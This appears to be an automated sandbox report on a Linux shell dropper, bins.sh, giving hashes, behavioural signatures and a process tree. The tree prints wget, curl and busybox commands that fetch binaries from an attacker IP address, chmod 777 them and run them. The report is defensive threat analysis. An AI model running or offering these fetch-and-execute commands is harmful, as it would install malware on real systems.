Analysis
-
max time kernel
122s -
max time network
116s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27-10-2024 21:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 736 chmod -
Executes dropped EXE 1 IoCs
Processes:
GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Msioc pid process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 737 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms -
Processes:
curlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurldescription ioc process File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms wget File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms busybox File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt wget File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:714
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:735
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
-
Filesize
40KB
MD5d59ca30fc049e0b93ea6e5fa3a43d3ba
SHA12942d8c5b503862f4f841c80fddff739bc439cb8
SHA2562cd178aa473e15b45b1581d14ef1568ed847c5e355ce6a92e6c59e8a972a9555
SHA512924b6ce3c1708932413f73cd43e153f74fc7a72ad4ce527414723627a506976748ca69b01ef767510332789d900d91adf9b746cea47579c369ae35738f5ab9fe